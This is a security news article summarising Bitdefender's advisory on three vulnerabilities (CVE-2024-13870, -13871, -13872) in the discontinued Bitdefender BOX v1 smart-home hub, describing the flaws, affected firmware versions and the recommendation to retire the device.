Image: Bitdefender
Bitdefender has issued a security advisory detailing three critical vulnerabilities affecting the Bitdefender BOX v1, a now-discontinued security hub designed to protect smart home devices. These flaws—tracked as CVE-2024-13870, CVE-2024-13871, and CVE-2024-13872—could allow unauthenticated attackers to execute arbitrary commands, downgrade firmware, or manipulate update mechanisms, potentially leading to remote code execution.
Outdated but Still Exploitable
The Bitdefender BOX v1, though no longer sold or supported, remains in use in many households. The device was initially marketed as an all-in-one cybersecurity solution for “computers, smartphones, tablets, baby monitors, game consoles, smart TVs, and everything that’s connected in your household.” However, its vulnerabilities leave users exposed to significant security risks.
CVE-2024-13870: Unauthenticated Firmware Downgrade
One of the reported vulnerabilities, CVE-2024-13870 (CVSS 1.8), allows an attacker within WiFi range to force the device into Recovery Mode and downgrade its firmware to an older, potentially vulnerable version. The flaw stems from improper access controls that fail to prevent unauthorized firmware rollbacks.
CVE-2024-13871: Command Injection Vulnerability
A more severe vulnerability, CVE-2024-13871 (CVSS 9.4), resides in the /check_image_and_trigger_recovery API endpoint of firmware version 1.3.11.490. This flaw enables an unauthenticated, network-adjacent attacker to inject and execute arbitrary system commands. In practical terms, this could grant a hacker complete control over the device, allowing them to manipulate traffic, disable security protections, or use the BOX v1 as a pivot point for attacking other connected devices.
CVE-2024-13872: Insecure Update Mechanism
Perhaps the most alarming issue is CVE-2024-13872 (CVSS 9.4), which affects Bitdefender Box versions 1.3.11.490 through 1.3.11.505. According to the advisory, the device “uses the insecure HTTP protocol to download assets over the Internet to update and restart daemons and detection rules on the devices.” This flaw allows attackers to perform Man-in-the-Middle (MITM) attacks, injecting malicious updates that could lead to remote code execution.
Mitigation and Recommendations
Bitdefender has provided an automatic update to version 1.3.11.510, which addresses CVE-2024-13871, but the company has emphasized that the product is no longer supported. Given the severity of the remaining vulnerabilities and the risk of unpatched exploits, users are strongly advised to retire the Bitdefender BOX v1 and migrate to a modern, actively maintained security solution.
Related Posts:
- Lazarus Group Lures Victims with Fake LinkedIn Job Offers, Warns Bitdefender
- New Cyber-Espionage Campaign Hits Europe: UAC-0063 Threat Actor Expands Operations
- Driver Signature Enforcement Cracked: OS Downgrade Attacks Possible on Windows
- 123 million American households information leaked online
